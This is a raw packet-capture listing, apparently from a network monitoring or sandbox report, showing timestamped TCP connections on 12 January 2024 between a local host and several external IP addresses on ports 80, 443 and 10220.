                                                                                                                                                                      Jan 12, 2024 06:48:02.994740963 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.994749069 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.994790077 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.994817019 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.994874001 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.995040894 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.995090008 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.995102882 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.995138884 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.995213032 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.995287895 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.995305061 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.995316029 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.995358944 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.995388031 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.995435953 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.995717049 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.995760918 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.995774984 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.995806932 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.995840073 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.995894909 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.996309996 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.996356964 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.996367931 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.996402025 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.996438026 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.996496916 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.996750116 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.996762037 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.996810913 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.996838093 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.996884108 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.997232914 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.997247934 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.997296095 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.997390985 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.997442961 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.997802973 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.997857094 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.997898102 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.997955084 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.998442888 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.998496056 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.998558044 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.998569012 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.998604059 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.998614073 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.998650074 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.998652935 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.998701096 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.999018908 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.999074936 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.999141932 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.999174118 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.999195099 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.999222994 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.999569893 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.999622107 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.999643087 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.276329041 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.277395010 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.277443886 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.277523994 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.277571917 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.543191910 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.543308973 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.543319941 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.543338060 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.543387890 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.543390989 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.543457031 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.543555021 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.543611050 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.543951035 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.544004917 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.544006109 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.544069052 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.544071913 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.544111013 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.544131041 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.544143915 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.544159889 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.544203043 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.544358015 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.544409037 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.544431925 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.544497013 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.544532061 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.544585943 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.544625044 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.544677019 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.544881105 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.544929028 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.544933081 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.544982910 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.544991970 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.545043945 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.545129061 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.545140028 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.545206070 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.545353889 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.545365095 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.545417070 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.545502901 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.545557022 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.545619011 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.545670033 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.545707941 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.545766115 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.545834064 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.545892000 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.546026945 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.546067953 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.546087980 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.546119928 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.546123028 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.546144962 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.546174049 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.546199083 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.546355963 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.546400070 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.546478987 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.546530962 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.546648979 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.546662092 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.546709061 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.546832085 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.546886921 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.546998978 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.547010899 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.547065973 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.547100067 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.547153950 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.547353029 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.547390938 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.547403097 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.547441006 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.547616959 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.547665119 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.547681093 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.547702074 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.547717094 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.547755003 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.547805071 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.547858000 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.548110962 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.548155069 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.548166990 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.548204899 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.548353910 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.548405886 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.548589945 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.548641920 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.548646927 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.548691988 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.548716068 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.548767090 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.548784018 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.548836946 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.551240921 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.551296949 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.551590919 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.551642895 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.551892996 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.551944971 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.551959038 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.552010059 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.552437067 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.552448034 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.552496910 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.552551031 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.552581072 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.552599907 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.552639008 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.552891016 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.552953959 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.554202080 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.554255962 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:12.830962896 CET44349745172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:12.831057072 CET49745443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:48:12.833827972 CET49745443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:48:12.873903990 CET44349745172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:12.912944078 CET1022049742116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:12.913028002 CET4974210220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:12.913305044 CET1022049747116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:12.913397074 CET4974710220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:12.913822889 CET4974710220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:12.962307930 CET8049746175.120.254.9192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:12.962515116 CET4974680192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:12.962877035 CET4974680192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:13.044914007 CET8049744175.120.254.9192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:13.045066118 CET4974480192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:13.045144081 CET4974480192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:13.102811098 CET1022049747116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:13.103159904 CET1022049747116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:13.103228092 CET4974710220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:13.103847980 CET4974710220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:13.107112885 CET4974710220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:13.107227087 CET4974710220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:13.248234987 CET8049746175.120.254.9192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:13.248337030 CET4974680192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:13.248558998 CET4974680192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:13.296017885 CET1022049747116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:13.296170950 CET1022049747116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:13.296183109 CET1022049747116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:13.344526052 CET8049744175.120.254.9192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:13.534243107 CET8049746175.120.254.9192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:13.557156086 CET44349745172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:13.557256937 CET49745443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:48:13.557315111 CET44349745172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:13.557373047 CET49745443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:48:13.557385921 CET44349745172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:13.557430029 CET44349745172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:13.557435036 CET49745443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:48:13.557501078 CET49745443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:48:13.559717894 CET49745443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:48:13.559746981 CET44349745172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:13.705775023 CET1022049747116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:13.705873013 CET4974710220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:14.133519888 CET4974310220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:14.134372950 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:14.322850943 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:14.322890997 CET1022049743116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:14.322952032 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:14.322972059 CET4974310220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:14.323887110 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:14.512207985 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:14.512674093 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:14.512790918 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:14.580996990 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:14.690685034 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:14.810923100 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:14.878858089 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:14.879245996 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:14.879302025 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:14.879354000 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:14.879407883 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:14.879446983 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:14.879517078 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:14.879517078 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:14.879517078 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:14.879527092 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:14.879574060 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:14.879642010 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:14.879683971 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:14.879713058 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:14.879713058 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:14.879743099 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:14.879766941 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:14.882666111 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.068341017 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.068355083 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.068365097 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.068404913 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.068416119 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.068464041 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.068504095 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.068515062 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.068522930 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.068537951 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.068573952 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.068608046 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.068670988 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.068702936 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.068768978 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.068797112 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.068871021 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.068900108 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.068932056 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.068973064 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.068996906 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.069066048 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.069128036 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.069163084 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.069211960 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.069264889 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.069283009 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.069348097 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.069401026 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.070874929 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.070946932 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.071029902 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.258326054 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.258404970 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.258542061 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.258555889 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.258565903 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.258589983 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.258606911 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.258642912 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.258645058 CET1022049751116.202.0.196192.168.2.4
